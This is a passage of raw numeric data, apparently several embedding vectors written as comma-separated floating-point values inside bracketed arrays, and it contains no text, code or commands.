006736415,0.061837163,-0.010495064,-0.028024195,-0.017356401,-0.05118077,0.0048018843,0.012139333,-0.07106525,-0.037729796,-0.0127942115,0.007515224,0.063207015,-0.0387772,0.0039895307,-0.039620608,-0.10346976,-0.01721533,0.052302595,0.015567701,0.04230594,-0.0019643197,0.044834763,0.039724868,0.02270711,-0.024495628,-0.01475478,0.025954941,0.051274072,0.028763048,0.028730376,-0.02020597,0.011131083,0.035288267,0.0074223764,0.042777237,0.07882539,0.07992355,-0.017889563,0.0053682416,0.0394205,-0.08318989,0.08236503,0.028430803,-0.11932796,0.043124314,0.0037703188,-0.0030269565,-0.044452425,0.055361416,0.02574855,-0.03698791,0.033603087,0.022992505,-0.009737367,-0.0063211704,-0.05232464,-0.01042662,0.011451711,-0.0122908065,-0.039976373,0.035615373,-0.005783185,0.018487696,0.0942877,-0.031680383,0.033760365,0.018158298,-0.03008536,-0.0045275413,-0.063150205,0.107529186,-0.002409808,-0.012095045,0.059094306,0.024017125,-0.060259845,0.010871643,-0.054482974,0.024694212,-0.04370661,-0.013915419,-0.02515183,0.008844043,-0.0019382181,-0.009125014,-0.04377782,0.049580503,0.015160059,-0.019142862,-0.012323167,-0.014226858,-0.058251094,0.01439955,-0.010623082,-0.0037109687,-0.079674706,-0.018429717,0.041967195,-0.025403796,-0.0063928994,0.007540408,-0.005149111,-0.020172559,0.0030289968,0.015347323,-0.016970344,0.023096371,-0.05882119,0.033668615,-0.00040170568,-0.033504892,-0.01661665,-0.018921973,-0.034141827,0.02872655,0.029334612,0.082132176,-0.04327561,0.01548268,0.025792025,0.06109696,0.01831092,0.024024025,-0.0032851163,-0.053594384,-0.01083855,-0.004135508,-0.0044349968,-0.013772567,-0.06288793,0.051558524,-0.0005759419,0.0207826,-0.043661416,0.013071636,0.0139379725,-0.0076558013,0.031721354,-0.024098113,0.015327413,-0.019974876,0.051873952,-0.015453911,-0.019637635,0.029848106,0.003966156,-0.035575267,0.011037637,0.025811959,0.0021529254,0.023880271,-0.041859023,-0.040603027,-0.0138223795,-0.023504933,0.012008894,0.011266349,0.07705622,-0.032821342,0.0014173887,0.020503135,0.035303023,-0.014725516,0.05526578,0.009303892,0.00093639846,-0.004363923,-0.008983783,0.048285607,0.00044603224,-0.058284678,0.017995855,0.022291854,-0.07725582,0.0026228928,-0.029719722,-0.043342747,0.04506336,-0.01592846,0.022369508,0.0022709281,-0.030171704,-0.034291346,-0.03314274,0.019051021,-0.023988185,0.039604086,0.0011274329,0.019190788,-0.0149006955,0.015729971,0.05070742,0.0012884458,0.012589538,0.04949065,0.011358383,-0.023455793,0.007756457,0.03174211,-0.006895925,-0.008257532,-0.059434906,-0.03880999,0.0034060339,-0.007560449,0.005677621,0.0036540313,-0.027550245,-0.017907606,-0.0573816,0.02852488,0.0027811048,-0.06250955,0.03792043,0.011508985,0.02339538,0.03565184,0.009561183,0.038973603,0.00044986952,0.02386216,-0.009218549,0.022723988,-0.033287138,-0.0040038843,-0.037560225,-0.005629683,0.04181924,-0.03130109,-0.017387046,0.041814044,-0.009485456,0.073589385,0.04446835,-0.04179081,0.04192945,-0.010047216,-0.031427134,0.009814005,0.020179495,0.02932915,0.030722013,-0.0033830206,-0.0043007135,-0.0042414544,-0.028608805,-0.044637006,0.00849818,-0.012027508,-0.006072162,-0.023419369,0.031286787,0.026055047,0.021566207,0.05451798,0.012471182,0.052125663,-0.03574916,-0.05135554,-0.023447448,-0.008995789,0.009869574,-0.035381746,-0.041639395,-0.013175673,0.038312025,0.0014341266,0.00777931,-0.013164954,0.025747197,0.002468984,0.0005288213,0.02371583,0.002566497,0.02843826,-0.0073512127,0.025243213,0.025130758,0.0058539947,0.0100240875,-0.04057695,0.013042786,0.05003543,0.033531714,0.009262455,0.0067268694,0.013251789,-0.030245373,0.03004154,0.017150458,-0.042939108,-0.04965931,0.0017463649,-0.090868115,-0.015402699,-0.05060526,-0.017813377,0.01283055,0.046574987,0.030230435,-0.034966942,0.011503203,-0.017819341,-0.0075263223,-0.05825244,-0.005703516,0.069658495,0.0029279545,0.018517321,-0.031103496,-0.013169752,0.06264141,0.025867343,0.044426575,-0.020232638,-0.047465507,-0.021302335,-0.0011526957,0.0033122639,-0.010016485,0.03811891,0.016869755,-0.024759827,0.030268874,-0.03272624,-0.017416835,0.014000139,-0.019309059,-0.031533808,0.05399755,0.02851477,-0.011902421,0.02320306,-0.023084195,-0.006329969,0.035051513,0.041068666,0.04221997,0.031793825,0.038082555,-0.012321263,0.034268703,-0.018156005,-0.0030287816,-0.017700579,-0.022493728,0.0034860882,0.04194757,-0.014931903,0.04371155,0.022232434,-0.00068803487,-0.03258435,-0.03969672,-0.004127279,-0.004121297,0.009799706,-0.028351031,0.018415423,-0.026355317,-0.0025505635,0.011595242,0.002586832,-0.050380535,-0.022722133,0.017561518,0.023572642,0.031964596,-0.032204244,0.017446605,0.043316104,-0.000007679126,-0.04455317,-0.02746934,0.029024825,0.032549456,-0.024740526,0.051426213,0.022004884,-0.02622311,0.03176094,-0.08264778,-0.025462808,0.036161613,0.010572272,0.0072027575,0.045281146,-0.053532336,-0.033664994,0.025590455,0.007992787,0.025308343,0.029433696,-0.03421234,-0.07465916,0.014319474,0.0060265795,0.021177206,0.007269589,-0.030109288,-0.009838798,0.036633734,0.028705446,0.04033981,-0.015434053,0.005753869,0.015808195,0.041515205,0.027283037,0.023878658,-0.074945755,0.06584436,-0.001326268,0.030521544,-0.01327044,-0.026177425,0.0007106537,0.033155315,0.059524186,-0.026556086,0.056441937,0.03214432,-0.041502077,-0.055762123,-0.045239072,0.017073331,0.027660456,0.048362315,-0.009955387,-0.05645035,0.026910957,0.00847386,0.027429907,0.08494065,0.024769772,0.104571566,-0.014960679,0.008769262,0.042192273,0.054126393,0.012985711,0.005605666,0.042367723,-0.03593893,0.015416825,0.021729006,-0.06767398,-0.014004415,-0.054826107,0.031864766,0.06627824,-0.027263619,-0.010292351,0.042580314,-0.014666564,-0.015843377,0.01881536,-0.04212712,-0.010296267,0.04240169,0.04386324,-0.0055813952,-0.030365612,-0.050320283,-0.043050688,-0.006480487,0.06023373,0.01657103,-0.036519643,0.021009278,-0.029527087,0.04463504,-0.00349898,0.034688566,0.0039261375,-0.043467537,-0.041089598,-0.008593531,0.05585365,0.05357942,-0.020026382,-0.008617394,0.061705064,-0.026535988,-0.03742458,0.027332542,-0.02748804,0.05507338,-0.054342747,-0.07959694,0.030094363,0.01239454,0.022693297,0.025584582,0.025738942,0.029143697,-0.08383382,-0.00011598273,0.039395,-0.015900644,-0.006812908,0.024954725,-0.01457328,-0.032210957,-0.037315954,-0.07368888,-0.040492263,-0.031785574,-0.084856294,0.013205748,0.008392847,0.05980677,0.045023635,-0.028664997,0.022386685,-0.021621551,0.041001387,-0.013194709,0.034472667,0.019106587,0.021358706,0.008684074,0.033112284,0.059253998,-0.018975655,0.0114888055,-0.0077898996,-0.030718468,0.035998985,0.02463609,-0.08321289,0.028551811,-0.016638067,-0.0072985454,-0.014894443,0.017465828,0.011624871,-0.020994479,-0.047764253,-0.0014086048,-0.011535857,-0.063632116,0.00747336,0.073454134,0.008285247,0.0024905545,0.007347615,-0.02866749,-0.02831244,0.00362433,0.05133057,0.031710256,-0.077749714,0.010771851,0.013649578,0.0012461704,-0.02590929,0.025619654,-0.005900903,-0.043745104,-0.07577573,-0.036262076,-0.067528315,0.0046457383,0.030801812,-0.03229287,0.0027140267,-0.068636976,-0.016527897,0.022059143,-0.024749676,-0.002704069,-0.01611666,0.039253503,-0.048859134,-0.0013412356,0.014651871,0.025554355,-0.0005045926,-0.09281857,-0.079898946,-0.018829646,0.011862312,0.08437595,-0.04326063,0.026383998,0.056551795,-0.03935312,0.04054771,0.03320648,0.019246822,-0.0011640895,0.019116247,-0.024264783,-0.011157242,0.005788947,-0.03477874,0.044742435,0.019824399,-0.023566917,0.014372363,-0.004142597,-0.03881526,0.012147405,-0.08330092,0.0023856582,-0.04998256,-0.011793119,-0.05212175,0.04126468,0.004133089,-0.06339675,0.004102877,-0.0428108,0.024011636,-0.04638009,0.032670427,-0.029290572,0.04011119,-0.008800476,0.052129835,0.01682056,-0.0048725163,-0.017877549,0.013035457,0.03398256,-0.006394664,0.055851296,0.10529202,0.010829274,-0.016946733,0.067728385,0.09913419,-0.009932372,-0.043073114,-0.027755938,0.013788704,0.0444054,0.020989504,-0.003659183,-0.0056136996,-0.01674244,-0.04962383,-0.03722295,-0.028689686,0.0070701228,-0.015344195,-0.0083280075,0.0016047731,-0.054153346,-0.02031014,0.037469674,0.009792488,-0.016658038,-0.036956385,0.041479588,0.010176615,0.0018798872,0.023007924,-0.030712971,-0.0093346955,0.013936297,0.0012293746,0.026001189,-0.011714736,-0.036520757,-0.013965044,0.0070721717,-0.01995978,-0.04367952,-0.013765022,-0.047746204,-0.043853424,0.0033733356,0.011656354,-0.042748783,0.033929843,0.00084831734,-0.033913072,0.0015328116,0.07467829,0.021948637,0.0031604602,-0.021353962,0.006548513,0.019736867,-0.014460853,0.048331372,-0.0038655729,-0.023391895,-0.07503978,-0.007971759,-0.006944709,-0.02959476,0.060076997,-0.0030893828,-0.0030233222,-0.033815097,-0.05171967,-0.030569222,0.022388058,-0.017314686,0.017052924,-0.023058038,0.043804374,0.03555151,-0.034632843,-0.019561222,-0.040820833,0.0041795974,0.029662943,-0.050738063,-0.04345107,-0.061687063,0.047449924,0.015060409,0.021953495,0.013109457,0.012856668,-0.05883003,-0.03617999,-0.061980758,0.048629284,0.02477849,0.008236561,-0.017787052,-0.018652275,-0.017093038,0.078325905,-0.00011204232,-0.059043005,-0.024271822,0.0007911535,-0.039089657,0.026943658,-0.041783385,0.016285129,0.030800361,0.014807054,0.12636426,-0.00089336,0.016373252,-0.040953044,0.05043196,-0.008567885,-0.06585148,0.012968909,0.009986784,-0.039541095],[-0.037820023,0.02144942,-0.1652916,-0.105577834,0.0525031,-0.027407352,0.03954703,0.025111217,-0.023730788,0.0015264258,-0.03186111,0.005857617,0.07343652,0.038618896,-0.00795845,-0.013801198,0.004383818,-0.048123613,-0.023263715,0.079773575,-0.079350926,0.019348923,-0.0034622354,-0.07247592,0.04522831,-0.00300116,-0.06559419,-0.0047913883,-0.037302636,-0.044666115,0.034649827,-0.050703842,-0.007673012,0.010484626,-0.0673611,-0.007092714,-0.012187844,-0.0088590225,-0.0023616895,0.058222566,0.06562884,0.048473287,-0.011361394,-0.037799157,0.041234713,-0.04402804,0.024012048,-0.033451132,0.034415778,-0.054823037,-0.013670763,-0.028139235,0.02029171,-0.029855933,0.09265668,0.05280603,0.0060322853,0.021650817,-0.0041349344,-0.076250255,0.010199868,0.09418011,-0.07125382,0.06375168,-0.009324539,-0.022558145,-0.049545698,0.09118503,-0.029055377,-0.0568749,0.05388608,0.02129109,-0.0068364115,0.02922682,-0.0320123,-0.020848675,-0.013824412,-0.06252825,0.018561741,0.00745631,-0.0017953677,-0.0070916656,0.07761919,0.034025762,0.024770357,0.010568823,0.005026621,0.03268026,-0.061807424,0.08370613,-0.016901717,-0.04962487,-0.010906867,0.03049219,-0.05977701,-0.027608313,-0.036246672,0.0022031376,-0.026103744,-0.030655907,-0.080859475,-0.011419904,0.026841471,-0.01311619,-0.008137524,0.041312877,0.04092599,0.03265113,-0.02241835,-0.011422729,-0.026582833,0.028873572,-0.058365133,0.010055501,-0.052847013,-0.031321697,0.030373707,0.009958375,0.01037258,0.011443946,-0.0202735,-0.064284645,-0.050268155,0.057018492,-0.019451747,-0.0024552878,-0.039035317,-0.012522195,-0.01831772,-0.029001758,-0.015640067,-0.022137994,-0.0139501225,-0.016431494,0.02426888,0.04154625,-0.024712006,-0.058019895,0.0115404185,0.018882522,0.007940485,-0.0013537355,-0.027805382,-0.027446127,-0.00989492,-0.06290072,-0.0027585763,-0.038340803,-0.025037669,0.011792852,0.037173036,0.019826612,0.006205026,0.06066734,-0.008915056,-0.021970661,0.029858807,-0.02522045,0.012822219,0.026963484,0.038710166,-0.010153938,-0.013052353,0.027852995,0.0061561144,-0.043569945,-0.029724302,0.04246707,-0.009682939,0.0029560255,-0.0810056,-0.031980734,0.0050188587,-0.0129723465,0.05260097,-0.014686636,0.06007342,-0.05846842,-0.035255,0.002756219,-0.01796476,-0.013335162,0.04952092,-0.016089935,0.006827394,0.012666005,-0.022620808,-0.032361798,0.014092471,-0.047513776,0.01961789,-0.021007955,-0.050441656,-0.01884136,-0.03336108,-0.04938827,0.02386155,0.016563559,0.028483614,-0.017003946,-0.043005325,0.0024375021,-0.0104252715,0.00648451,-0.042531833,0.0563619,0.023204809,0.011292236,-0.014150635,0.032214426,0.078700446,0.018936697,0.0010170388,-0.005011909,-0.013910719,0.044738293,-0.001422115,0.0077168504,-0.054310534,0.024044912,-0.005134059,0.009441183,0.005137224,-0.013484578,-0.0024218014,-0.019494431,-0.017560313,0.00955162,-0.010274972,-0.00588772,0.0141896615,-0.06606752,0.021549428,-0.03871007,0.029762166,0.026695285,0.051945224,0.055969067,0.0042710756,0.004033812,0.040257227,0.016645333,0.01829846,-0.019093899,-0.0155930165,-0.027654456,0.025483621,-0.015919764,-0.0007586102,0.052872483,0.0073779966,0.010939896,0.016914666,-0.016265918,0.010091297,-0.04233644,-0.016374897,0.011970702,-0.0024448154,0.029430348,0.029661516,-0.034390986,-0.011670203,0.015242273,-0.0381616,-0.034513615,0.0077384375,0.0063525354,-0.010813289,-0.014849193,-0.011759364,0.044888392,0.023391759,0.034770913,-0.033709396,0.007900796,-0.02296588,-0.037445698,-0.029523995,0.03885744,-0.020201381,-0.04590311,-0.019900814,-0.006026387,0.0028038928,0.021430388,0.0072732996,0.018670544,-0.023729824,0.027871406,-0.0074863364,-0.0084770685,0.010886917,0.03353029,-0.016978268,0.033492047,0.037444092,0.007722126,-0.002420545,-0.044274278,0.02060401,0.0399512,0.052420504,0.06543316,0.036181614,-0.015712408,-0.015094665,-0.013061025,0.04857709,-0.012473325,-0.032542434,-0.031157099,-0.014170549,0.02420468,-0.008752426,0.024688106,0.026573109,0.037751187,0.027502442,-0.008795729,-0.018862246,-0.02953756,0.03107805,-0.03102624,-0.02385856,0.08309723,-0.013587284,0.011231421,-0.044516645,0.017747838,0.018989665,0.06551369,-0.016413115,-0.048885297,-0.00009465857,0.031457406,0.033011913,0.02725225,0.023849163,0.028375043,0.051949214,0.018482557,0.03553479,0.0036541333,0.008954572,0.02161181,-0.010226717,-0.052957915,0.058502804,0.034855086,-0.0045126257,0.027319074,0.0065203174,-0.019322,0.011045395,-0.011973642,0.029183948,0.021179177,0.041906066,0.017185258,0.06772471,-0.019826172,0.01598802,-0.010978975,-0.015862135,0.02470004,0.013327862,0.003840881,0.0065075513,0.04317632,-0.02069822,-0.041913606,-0.05290846,-0.034343977,-0.025966754,0.023175446,-0.029735576,0.017623292,0.008169319,-0.0024517304,0.0172431,-0.009529689,-0.0557517,-0.010055249,0.012085841,0.022123404,-0.02698108,-0.0020897554,0.057606228,0.02897508,-0.0068509653,0.023152104,-0.020640513,-0.027612459,0.05355932,-0.033151954,0.032552358,0.024360305,-0.02915944,0.012646613,-0.06709979,-0.08547572,-0.00035089086,0.00008056274,-0.056241266,0.028959392,0.0072558047,-0.02648134,0.069029324,0.0021261764,0.022131957,0.0125722,0.024649713,-0.035721533,0.008503639,0.04068472,0.035022065,0.030196425,-0.0043868585,0.003930751,-0.007512137,0.0372337,-0.010999485,0.018545168,0.07264834,0.0208693,0.057333034,0.050382823,-0.0071768584,-0.056320943,0.06502634,-0.010249202,0.0764453,-0.013344182,0.018880934,0.0030464388,0.029508237,0.042593006,-0.0028072847,0.060647424,0.04616021,-0.04800548,-0.0393484,-0.06462503,0.021302273,0.018305566,0.04877945,-0.051142175,-0.07670261,-0.012984557,0.009521358,0.05612387,0.05439418,0.043559004,0.09156489,-0.017565086,0.012190509,-0.0028466454,0.0133514,0.015406945,0.013331932,0.055292934,-0.040064696,0.007062558,0.018856023,-0.052950215,-0.028335778,-0.025668876,0.049295872,0.06785678,-0.04471238,0.038871896,0.00815473,-0.031007184,-0.00309652,0.010311366,-0.021973552,-0.045828316,0.03221743,0.05863786,0.0024044919,-0.0682593,-0.00020223267,-0.03286232,-0.030660959,0.036431823,-0.0031023563,0.00017538782,0.030359589,-0.012923548,0.03347458,-0.02208833,0.020420574,-0.0030770726,-0.03499962,-0.003787406,-0.0062769414,0.054652,0.035902895,0.03063352,0.024721272,0.067658775,-0.0077958982,-0.0006427276,0.025268586,0.001142019,0.09366183,-0.022314839,-0.044844955,0.04753082,0.018127138,-0.011736091,-0.019188957,0.037952993,0.054093085,-0.05580842,0.007809844,0.027270399,-0.0021150324,-0.025937233,-0.014299542,-0.07518361,-0.066419035,-0.0004883917,-0.032881252,0.0052291392,0.00015922765,-0.113718,0.042855646,0.014032971,0.0066323956,0.06687126,-0.054844033,0.027130248,-0.008764733,-0.027498836,-0.05389498,0.040767968,0.0037172032,0.02043379,0.008000684,0.032269727,0.03872429,-0.002920051,0.027853573,0.027202155,0.02325471,-0.0037668664,0.011627613,-0.06626679,-0.0025895124,-0.05368916,0.00681436,-0.039522693,0.05509505,-0.047774054,-0.037946094,-0.07073681,-0.004764902,-0.03940763,-0.022317152,-0.0038518484,0.047578964,-0.030407058,0.006350092,-0.031349443,0.01728528,-0.00825118,0.0014291697,0.008992756,0.046935502,-0.12195965,-0.0016126456,-0.041541655,-0.014440214,-0.03430349,0.035086494,-0.004243586,-0.06888643,-0.049016424,-0.000100866484,-0.05074866,0.02405292,0.0525987,-0.030820869,0.025560236,-0.059744194,-0.013546289,-0.006142386,0.0099260565,-0.051126607,-0.028589198,0.031882964,-0.016452817,0.012515354,0.004167231,0.01899588,0.030202622,-0.026592815,-0.079922795,-0.020159168,0.035279866,0.07332236,-0.04364558,0.029829085,0.11177936,-0.00029537381,0.029353447,0.025694802,-0.027872339,0.02084662,0.017743612,-0.033972315,0.00056556024,0.0069709728,-0.016594434,0.014638422,0.024486119,-0.009147162,-0.0021903822,0.0037593727,-0.07451728,0.070308715,-0.084998354,0.011783639,-0.0005364429,-0.036765616,-0.00082334434,-0.00013790313,-0.003950777,-0.05292527,-0.01796553,-0.07740023,0.034068618,-0.06536217,0.031493735,-0.05615098,0.046856176,-0.03458363,0.033888668,0.054015294,-0.043698918,0.018966774,0.027521273,0.056728836,-0.023605118,0.0224114,0.070764944,0.02509081,-0.03344213,0.024982864,0.05741106,0.02151516,0.0128950365,-0.012948786,0.031080458,0.06250942,-0.018393148,-0.033584893,-0.015157755,0.025285099,-0.03692644,-0.006559356,-0.006771317,0.012727749,0.037929628,0.009014997,-0.011279913,-0.015147147,0.031139078,0.026812255,0.04029652,0.03434876,-0.040815886,0.021194384,-0.0061313696,-0.015059625,0.06968848,0.012526188,-0.031032844,0.0016684439,-0.035550866,0.053898074,0.0032620877,0.006553215,-0.050192975,-0.011538373,0.012257528,-0.03857064,-0.02516358,-0.003795116,-0.035872657,-0.008524821,0.038208283,-0.021863401,0.042728312,-0.013120093,-0.0124951955,-0.0362305,0.07513401,0.020022154,0.005438818,-0.04022631,0.064496465,-0.0002824195,-0.027669564,0.0022025038,-0.011408427,0.0039238003,-0.06522691,-0.005097982,0.03863745,-0.00062795327,0.0613258,0.029646702,0.010374431,-0.009773142,-0.035921924,-0.03819856,0.02802206,-0.0014564379,-0.028684374,-0.046627715,-0.01143748,0.012336396,-0.0044501415,0.034645423,-0.06105752,-0.01569658,0.02419341,-0.0021989292,0.004552209,-0.03138605,0.06661722,0.011186886,0.045260992,0.005316478,-0.016217105,-0.057334818,-0.04162189,0.0102460915,0.0026716716,-0.0038633742,0.022138214,-0.011533889,-0.009675972,-0.0526361,0.07375787,-0.023739032,-0.06008265,0.006647639,-0.009500104,-0.042490255,0.006722982,-0.027112966,-0.008231088,0.020350188,0.053172562,0.07941891,-0.0041015544,0.017797405,-0.02599395,0.035217848,-0.040850084,-0.054030027,0.0013539579,-0.02763246,-0.011324729],[0.0105472645,0.03284855,-0.13183536,-0.07865206,0.093583785,0.013793771,0.027486457,0.0023114092,0.010654808,0.02117343,-0.03066798,0.01334988,0.048557956,0.07958678,-0.0014877892,-0.010124686,0.014534857,-0.05213725,0.029570015,0.04277706,-0.052342422,0.016474871,-0.033835433,-0.07960609,0.06332565,0.03784005,-0.02701065,0.02212769,-0.032691408,0.03195519,-0.016721118,-0.027586559,-0.03946301,-0.02006572,-0.10894339,-0.06768742,0.018380808,0.059753478,-0.0119202705,0.011068301,0.041460697,0.028088287,0.001540514,-0.031811368,-0.010225393,-0.012012334,0.047103588,0.050105486,0.040131263,-0.12345562,0.0054909885,-0.05752315,0.047330704,0.01060731,0.068821564,0.054012757,0.0033666475,0.01309701,0.008459727,-0.023020536,0.0045699906,0.072930366,-0.045390043,0.043560818,-0.0038175525,0.015939394,-0.0505271,-0.018365104,0.020702349,-0.027522804,0.073639475,-0.025961652,-0.02262494,0.024531437,0.010266539,0.0216669,-0.02959026,-0.011697345,0.010372401,0.026395163,0.043183748,-0.020318126,0.09002027,-0.030283008,0.04796718,-0.015680792,-0.03783333,-0.015452876,-0.055528786,0.046859022,-0.031474147,-0.056350283,0.061525278,0.03963421,-0.08290387,-0.028114676,-0.0281091,0.027724408,-0.04362999,0.014244749,-0.06772698,-0.0047818427,-0.026483828,-0.050494038,0.025630765,0.064603105,0.004741574,0.009270127,-0.016956681,-0.05412695,-0.017153734,0.024459729,-0.04776018,-0.032234024,0.008693214,-0.010431254,0.011288458,-0.05599671,-0.03274698,0.015187446,0.03471581,-0.024999589,-0.039014474,0.05506688,0.018973049,0.0055942615,-0.030386252,-0.0071453527,-0.019765567,-0.030075194,0.016813336,-0.010396033,-0.01621432,0.016981984,-0.008080917,0.021263037,-0.021938682,-0.023592532,0.0380589,-0.0056325165,0.06365574,0.027210895,-0.030961256,-0.03761723,0.012175303,-0.103219554,-0.012019314,-0.016884737,-0.043050103,0.011821676,-0.028831381,0.030968025,-0.015357562,0.012673773,0.0534007,0.006620512,0.030538235,0.04209037,0.009295956,0.019885944,0.058408454,0.03669349,-0.035180617,0.07262727,0.0033058363,-0.03895874,0.000099099256,0.011988056,-0.027402408,0.022270419,-0.06519991,0.0011072075,-0.017842254,-0.03136933,0.07219172,0.017439984,0.019779652,-0.043341428,-0.013448571,0.002662749,-0.0070403614,-0.012532663,0.020958973,0.011734457,-0.015145004,-0.02071709,0.009033939,-0.009177361,-0.036034424,-0.04650735,0.007596581,0.026581718,-0.051354155,0.008639109,-0.040350195,-0.06128747,-0.011772844,-0.03387664,0.04865359,0.003673716,-0.03357436,-0.036595512,-0.005875094,0.012772323,-0.07242424,0.06592211,-0.017164668,0.017632056,-0.03158533,-0.008008938,0.056085557,-0.001073319,0.032360617,-0.022951545,0.018317165,0.009714915,0.025138827,0.025156649,-0.059065674,-0.019946367,0.0240281,0.0009300005,0.013264646,0.009491653,-0.0099075595,0.03176411,-0.016589066,0.030572316,-0.06887556,-0.0049655377,0.003331625,-0.04851094,0.06669892,0.002085939,0.03770647,0.074294046,0.058776386,0.029675426,0.010871158,0.022644939,-0.01205656,0.052883297,-0.03740169,0.068525076,-0.042873666,-0.0051892456,0.028351773,-0.012147181,-0.013343537,0.05626465,-0.042535584,-0.020774402,-0.040396243,0.011112099,0.06877732,-0.03487262,-0.023497839,0.008569413,0.027485523,0.03206673,0.018611206,-0.045752667,-0.008808485,-0.006871402,-0.04500456,-0.06767748,-0.016709132,-0.02063223,-0.0038015125,-0.02613612,0.017002549,0.05644678,0.044330508,0.0337922,-0.009968563,0.009523624,-0.04324065,0.003664709,0.05554132,0.011543024,-0.022529665,0.036659863,-0.06059269,0.021156799,0.021806259,0.005101954,-0.015387927,0.042285014,-0.016325666,-0.012911116,0.00447956,0.007818927,-0.047159106,0.030449398,-0.05880773,0.0067812908,0.020210322,-0.036442608,0.021507345,-0.04680539,0.059706286,0.03452638,0.020415235,0.019116241,0.03094985,-0.025232885,-0.027068164,0.015139629,0.043756384,-0.04618301,-0.06848085,0.013593485,-0.005949328,-0.0018905893,-0.0005547354,0.033083275,0.003907547,0.06882349,0.018558526,-0.011030486,-0.041924126,-0.014480096,-0.0005244816,0.0052102585,-0.036548033,0.07221321,-0.03818215,0.0054142457,-0.009048445,-0.011434349,0.046242584,0.017603831,0.024286475,-0.03409479,-0.034217983,-0.024938066,0.045213908,0.007826118,0.019752413,0.050980896,0.054160956,0.025225865,0.05998751,-0.023722,0.029099753,0.013689365,-0.061630517,-0.006872019,0.08256253,0.015249281,-0.02069122,0.02136688,0.013579434,0.017284714,0.018916838,-0.028984774,0.0734249,0.008036648,-0.010398527,-0.018167714,0.06352957,-0.0005327279,-0.035236105,-0.006913103,0.024055338,0.056070182,0.044658598,-0.014662548,-0.010203123,0.015812183,-0.03239972,-0.02377565,-0.053604033,0.021204853,-0.012317637,-0.034181453,-0.0547796,-0.022228794,-0.010796536,0.03552712,-0.012431286,-0.0076712593,0.03998023,0.025072144,0.032051366,0.021497117,0.01213179,-0.035387423,0.034358177,0.019337507,0.009841935,0.01953394,-0.07219595,0.012763563,0.07726385,-0.0015636809,0.012257798,0.012714915,-0.023972157,0.042260878,-0.03179094,-0.058160633,0.04909575,-0.012180137,-0.025184711,-0.04194192,0.0073890826,-0.017093603,0.017827487,-0.02620632,0.029868664,0.036493648,-0.019212369,-0.04662774,0.011580411,0.009605735,0.043637864,0.019964965,-0.014077065,-0.0012471348,0.03855616,0.07634417,-0.010099056,0.005067534,-0.013898863,0.030636197,0.006157938,0.076339565,-0.025010861,-0.033768613,0.059840504,0.008593346,0.066617526,0.018728388,0.032889426,0.014409302,-0.035219807,0.072648264,-0.0050742044,0.023279626,0.044760387,-0.05896844,-0.08013244,-0.044847004,0.022897583,0.007105989,0.045322336,-0.03242135,-0.076339304,-0.013363487,-0.06983516,0.05691554,0.013560032,0.023470452,0.08201553,-0.0062210946,0.028828684,0.025584454,-0.044640094,0.004037034,0.017251952,0.03170208,-0.03034877,0.032758027,0.0315585,-0.033049494,-0.011320673,-0.045631044,0.046438638,0.009424055,-0.05186897,0.03416311,-0.009913901,-0.047112163,0.016589556,-0.053643726,-0.010028233,-0.023995675,0.024454912,0.04874917,0.011871658,-0.02782683,0.0034912939,-0.016359607,-0.030884976,0.06290875,0.026813148,0.004462996,-0.0133868195,-0.007559566,0.056927547,-0.012583745,0.009897992,-0.026989881,-0.06828027,-0.027909331,-0.015672212,0.034210112,-0.002834293,0.043072578,0.009542239,0.03871094,0.0072222385,0.023973815,0.043451395,-0.0152157415,0.03200313,-0.053753696,-0.03115797,0.02665568,0.012143307,-0.024950506,-0.0117063895,0.0019835304,0.077286,-0.054972358,-0.0049197837,-0.0024605545,-0.04210732,0.011919874,0.022345979,-0.070310466,-0.0076928264,-0.072729476,-0.062117882,0.012663495,-0.0069727344,-0.11126464,0.035676893,0.010822581,0.015393039,0.054704003,-0.03588301,0.004906307,0.05543976,-0.04560306,0.0062678056,0.038171545,0.033228558,0.036536697,0.016070312,0.009497362,0.011368984,0.036519706,0.017075397,0.046680614,-0.005672216,0.024470195,0.005824394,-0.08153397,-0.021733535,-0.021736814,-0.014349241,-0.023780018,0.07582811,-0.030424327,-0.07188278,-0.03638305,-0.04206131,-0.021518575,-0.026668884,0.015251002,0.04488517,0.010772644,0.010137935,-0.030382512,-0.026039312,0.016782543,-0.0063417414,0.022558661,0.027671631,-0.04476689,0.010135939,-0.038889468,-0.027924445,0.0045888657,0.006950436,-0.0040465267,-0.042819563,-0.06403289,0.037049726,-0.03414958,0.0136820935,0.042970132,0.011508534,0.037526708,-0.030449897,-0.00096902595,0.028415922,-0.01830629,-0.032976165,-0.02730763,0.0020921545,-0.034082603,-0.0023493865,0.0063486104,0.010650552,-0.034920014,-0.04908542,-0.067714304,0.039997105,0.027213251,0.08325373,-0.052294143,0.017925594,0.09449854,0.0013448313,0.037914008,-0.030753314,-0.06300312,0.010825553,0.017234795,0.020125506,-0.011316231,0.019735282,-0.012925074,0.04924755,-0.0038068162,-0.022958914,-0.035876714,-0.027467776,-0.041763023,0.048713196,-0.05158519,0.033551663,0.014601401,-0.024236903,-0.028886665,0.004642441,0.037350032,-0.03241748,0.0043856483,0.0010947672,0.0036752603,-0.022808146,0.007281815,0.017621977,0.042725563,-0.018188281,0.02861813,0.031461153,0.00212951,0.0037487443,0.045675423,0.02902901,-0.021263948,0.0012473628,0.03464474,0.015097935,0.008724356,0.020085707,0.047904115,0.023607843,0.00075733336,-0.0070224195,0.020729452,0.020733126,-0.018949479,-0.028855063,-0.02105699,0.017237004,-0.015382744,-0.07504026,0.001551565,0.018277345,-0.024677034,-0.0067865434,-0.016421694,-0.03616898,-0.0050501064,0.032221403,-0.022934847,0.022976754,-0.045660682,0.011342759,-0.02411087,0.0027928627,0.025526555,0.00883424,-0.044244967,0.044045202,0.010523205,0.06123079,-0.022929437,-0.049069725,-0.041851833,0.050390746,0.022335142,-0.06888313,-0.040621355,0.015306133,-0.019284004,0.053543687,0.0074957204,0.022980355,0.025176058,0.007973338,0.0026639455,-0.016353756,0.028911969,-0.02095054,0.03786787,-0.029176341,0.040911764,-0.009663233,-0.0205319,0.026887018,0.019765127,-0.020446962,-0.040826928,-0.019263713,0.03913463,-0.062488485,0.049228176,0.012555336,-0.018933931,-0.03386168,-0.04900584,0.012851393,0.007522869,0.007823967,0.009709834,-0.05605901,-0.035342373,-0.03441512,-0.020417482,0.054784566,-0.031979904,0.013120433,0.04227282,0.012586648,-0.0028916646,-0.01748546,0.039765224,-0.019232022,0.0385117,-0.020195901,-0.021314606,-0.029582977,-0.019201182,-0.046875674,-0.039232597,0.012203356,-0.010183753,0.0213574,-0.058306575,-0.03989694,0.046364117,0.00933471,-0.06590851,0.012458725,-0.032323815,-0.05966646,0.023570653,-0.025991771,0